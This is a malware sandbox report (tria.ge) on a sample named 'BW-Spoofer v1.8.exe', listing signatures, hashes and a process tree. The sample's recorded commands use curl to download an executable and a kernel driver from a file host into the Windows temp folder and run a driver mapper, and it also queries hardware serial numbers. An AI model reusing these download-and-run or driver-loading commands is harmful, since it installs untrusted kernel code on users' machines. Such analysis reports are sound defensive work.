Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
35s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19/04/2024, 06:39
Static task
static1
Behavioral task
behavioral1
Sample
BW-Spoofer v1.8.exe
Resource
win10v2004-20240412-en
General
-
Target
BW-Spoofer v1.8.exe
-
Size
608KB
-
MD5
80b055d3c394b8d67a3471209baaffff
-
SHA1
fc91bae8f742757c369ece9708c90cb45bd38a84
-
SHA256
421adb3b2479b676edb2e536abadf8063b0bf56f50732a06e0c59afb7ed995b3
-
SHA512
e75b76d7c776a85aa3f14de4e0da983b8997b811901f30b153234a05a01b9b18aee4729189e7195b98f696c35b6d7032ef8b6bfee307307f4a9be09ab8ee30fb
-
SSDEEP
12288:f+Q/fzJitK/Ujd7c9c+l3xa5yGsi+1u3ENf:f+QjJitMUJ7+l3xULsc3E5
Malware Config
Signatures
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VJNrGntiJlzQwIWsLpS\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VJNrGntiJlzQwIWsLpS" mapv2.exe -
Executes dropped EXE 1 IoCs
pid Process 3528 mapv2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 51 discord.com 52 discord.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-259785868-298165991-4178590326-1000\{48D78BC9-8461-485A-B8F4-2D6C12DFCFB2} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe 4808 BW-Spoofer v1.8.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3528 mapv2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeLoadDriverPrivilege 3528 mapv2.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeSecurityPrivilege 1464 WMIC.exe Token: SeTakeOwnershipPrivilege 1464 WMIC.exe Token: SeLoadDriverPrivilege 1464 WMIC.exe Token: SeSystemProfilePrivilege 1464 WMIC.exe Token: SeSystemtimePrivilege 1464 WMIC.exe Token: SeProfSingleProcessPrivilege 1464 WMIC.exe Token: SeIncBasePriorityPrivilege 1464 WMIC.exe Token: SeCreatePagefilePrivilege 1464 WMIC.exe Token: SeBackupPrivilege 1464 WMIC.exe Token: SeRestorePrivilege 1464 WMIC.exe Token: SeShutdownPrivilege 1464 WMIC.exe Token: SeDebugPrivilege 1464 WMIC.exe Token: SeSystemEnvironmentPrivilege 1464 WMIC.exe Token: SeRemoteShutdownPrivilege 1464 WMIC.exe Token: SeUndockPrivilege 1464 WMIC.exe Token: SeManageVolumePrivilege 1464 WMIC.exe Token: 33 1464 WMIC.exe Token: 34 1464 WMIC.exe Token: 35 1464 WMIC.exe Token: 36 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe Token: SeSecurityPrivilege 1464 WMIC.exe Token: SeTakeOwnershipPrivilege 1464 WMIC.exe Token: SeLoadDriverPrivilege 1464 WMIC.exe Token: SeSystemProfilePrivilege 1464 WMIC.exe Token: SeSystemtimePrivilege 1464 WMIC.exe Token: SeProfSingleProcessPrivilege 1464 WMIC.exe Token: SeIncBasePriorityPrivilege 1464 WMIC.exe Token: SeCreatePagefilePrivilege 1464 WMIC.exe Token: SeBackupPrivilege 1464 WMIC.exe Token: SeRestorePrivilege 1464 WMIC.exe Token: SeShutdownPrivilege 1464 WMIC.exe Token: SeDebugPrivilege 1464 WMIC.exe Token: SeSystemEnvironmentPrivilege 1464 WMIC.exe Token: SeRemoteShutdownPrivilege 1464 WMIC.exe Token: SeUndockPrivilege 1464 WMIC.exe Token: SeManageVolumePrivilege 1464 WMIC.exe Token: 33 1464 WMIC.exe Token: 34 1464 WMIC.exe Token: 35 1464 WMIC.exe Token: 36 1464 WMIC.exe Token: SeIncreaseQuotaPrivilege 468 WMIC.exe Token: SeSecurityPrivilege 468 WMIC.exe Token: SeTakeOwnershipPrivilege 468 WMIC.exe Token: SeLoadDriverPrivilege 468 WMIC.exe Token: SeSystemProfilePrivilege 468 WMIC.exe Token: SeSystemtimePrivilege 468 WMIC.exe Token: SeProfSingleProcessPrivilege 468 WMIC.exe Token: SeIncBasePriorityPrivilege 468 WMIC.exe Token: SeCreatePagefilePrivilege 468 WMIC.exe Token: SeBackupPrivilege 468 WMIC.exe Token: SeRestorePrivilege 468 WMIC.exe Token: SeShutdownPrivilege 468 WMIC.exe Token: SeDebugPrivilege 468 WMIC.exe Token: SeSystemEnvironmentPrivilege 468 WMIC.exe Token: SeRemoteShutdownPrivilege 468 WMIC.exe Token: SeUndockPrivilege 468 WMIC.exe Token: SeManageVolumePrivilege 468 WMIC.exe Token: 33 468 WMIC.exe Token: 34 468 WMIC.exe Token: 35 468 WMIC.exe Token: 36 468 WMIC.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4808 wrote to memory of 3496 4808 BW-Spoofer v1.8.exe 87 PID 4808 wrote to memory of 3496 4808 BW-Spoofer v1.8.exe 87 PID 3496 wrote to memory of 216 3496 cmd.exe 88 PID 3496 wrote to memory of 216 3496 cmd.exe 88 PID 3496 wrote to memory of 5116 3496 cmd.exe 89 PID 3496 wrote to memory of 5116 3496 cmd.exe 89 PID 3496 wrote to memory of 4728 3496 cmd.exe 90 PID 3496 wrote to memory of 4728 3496 cmd.exe 90 PID 4808 wrote to memory of 1164 4808 BW-Spoofer v1.8.exe 94 PID 4808 wrote to memory of 1164 4808 BW-Spoofer v1.8.exe 94 PID 4808 wrote to memory of 2632 4808 BW-Spoofer v1.8.exe 95 PID 4808 wrote to memory of 2632 4808 BW-Spoofer v1.8.exe 95 PID 4808 wrote to memory of 2808 4808 BW-Spoofer v1.8.exe 96 PID 4808 wrote to memory of 2808 4808 BW-Spoofer v1.8.exe 96 PID 4808 wrote to memory of 3376 4808 BW-Spoofer v1.8.exe 98 PID 4808 wrote to memory of 3376 4808 BW-Spoofer v1.8.exe 98 PID 3376 wrote to memory of 1052 3376 msedge.exe 99 PID 3376 wrote to memory of 1052 3376 msedge.exe 99 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 1780 3376 msedge.exe 101 PID 3376 wrote to memory of 4752 3376 msedge.exe 102 PID 3376 wrote to memory of 4752 3376 msedge.exe 102 PID 3376 wrote to memory of 912 3376 msedge.exe 103 PID 3376 wrote to memory of 912 3376 msedge.exe 103 PID 3376 wrote to memory of 912 3376 msedge.exe 103 PID 3376 wrote to memory of 912 3376 msedge.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe"C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer v1.8.exe" MD53⤵PID:216
-
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵PID:5116
-
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵PID:4728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D2⤵PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffecc7046f8,0x7ffecc704708,0x7ffecc7047183⤵PID:1052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:83⤵PID:912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:13⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:13⤵PID:1196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:13⤵PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3860 /prefetch:83⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4892 /prefetch:83⤵
- Modifies registry class
PID:3348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:83⤵PID:1836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15806070981629463471,11258501745294158395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:83⤵PID:3124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D2⤵PID:4532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D2⤵PID:3160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent2⤵PID:1448
-
C:\Windows\system32\curl.execurl https://link.storjshare.io/s/jv77rvcr2fbthhfxsdqj4tz55nua/bw-ontop%2Ffree%2Fbwmapper.exe?download=1 -o C:\Windows\Temp\mapv2.exe --silent3⤵PID:840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent2⤵PID:1488
-
C:\Windows\system32\curl.execurl https://link.storjshare.io/s/jxw2m5pxqvcndnlpkcyfj63g2niq/bw-ontop%2Finjected%20ud%20is%20ud.sys?download=1 -o \Windows\Temp\drvv5.sys --silent3⤵PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cd C:\Windows\Temp\ && mapv2.exe drvv5.sys2⤵PID:3208
-
C:\Windows\Temp\mapv2.exemapv2.exe drvv5.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D2⤵PID:3500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D2⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo Diskdrive:2⤵PID:4524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber2⤵PID:1600
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo BIOS:2⤵PID:3176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic bios get serialnumber2⤵PID:4580
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo Motherboard:2⤵PID:1036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber2⤵PID:4672
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo Bios UUID:2⤵PID:4872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_computersystemproduct get uuid2⤵PID:2236
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo Mac:2⤵PID:528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c getmac2⤵PID:4120
-
C:\Windows\system32\getmac.exegetmac3⤵PID:4728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause >nul2⤵PID:3996
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1648
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4656
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD53d94406b964753cc5222ab1343f54bb1
SHA1a5e7de0781fa1fabb3cd89564f2e5693cb4dee16
SHA256fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762
SHA5121ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598
-
Filesize
152B
MD549dde89f025a1cce8848473379f7c28f
SHA1b405956b33146b2890530e818b6aa74bba3afb88
SHA256d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b
SHA51253050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize864B
MD585c93cd3830ae6c765e73141a2956df0
SHA16962c4e2c4f5de72f86ed52ddfe798a8d438ca79
SHA256a55056b1f684f80de5ce9a612279e95dcc9cf39c814fe1d11a71fef2e64ce426
SHA5129e6bf30c746c4214e37511ae63ded98b00d2deb9afea3245b9a3206650237346e828d2c0df7b160043ee2af5317c76303b8b5597908301cca57d8b2e85a0801d
-
Filesize
813B
MD518285e81786fd859cebf1cdf5268b108
SHA19d7a6bc3035143dd5757967d0799c87fb80637b7
SHA256f741d75610d7c6ba12145dc9b974350ffc8caa72a203e2e0c9c69ceb8aac0313
SHA51208adfdcc43001d719065da797260a7650ee1a9c0a02677fae769be7359b8fab53db32a54c6775ae7390364e63695c8d6b8ea1eafd7865d9ead8003b7d368ea0a
-
Filesize
5KB
MD5b6da64b58dc031d8384323aaa7a7dd15
SHA1fc589f5944083aa4b741cbc3ce5e8e4b3e8d9af8
SHA2562c35cd4219305daaae8949af82aedf242b68b87117f39cb158123965ab79962e
SHA512cf61f70e6c51092de55e252c6f0c141f6ba12a373b7e620562ad632badb5c58e0c0691b800b9c8f450a404491bc2ad94a79d21e2c761ec89e0685c8543771050
-
Filesize
7KB
MD59c1168181f38ff7403e693f768f4401d
SHA1628090e370b8317cc96c102da4de04b3207dccd0
SHA256163d247ffbdef93a7bbe1f4060dc27dfb58660880d57dd0a16b9d44e31264df2
SHA5123a8fba4f4abdc9b19fd36cab108b5b0e6e83d9ecc4e49c70d2c41333ca8cc0b78ddb63b04e3e762d8d57da042c231a270e4a69b4226594a9d92be03b93c36c10
-
Filesize
24KB
MD57c43199d1e5acf5a31e1cbef990fbc47
SHA1df7bd524b9b3175325c0aff3469ea7f2211d3061
SHA25652a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22
SHA512aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD53dab013c5b140a53d98e5f75568053cb
SHA10f1d913ecf12c0b18cff533def5e92ca5f4aa082
SHA256d823c718891898c8b876a2d34f8d3fdcf42ba83fa53da82f490c81ca426b7885
SHA512c4d4c5876626aa2d695ae81469c437bc6947d9e9830bae8c83dd09401c817c44a658b3b9c6cc79369e7990cba6d19970d9bb49071eaa46d24f751a7f8613f110
-
Filesize
112KB
MD5e25351a9dd41d1c339530c465fe18569
SHA12461491598a2ab092b352f2caf375accde6e9d85
SHA256d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
SHA512888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1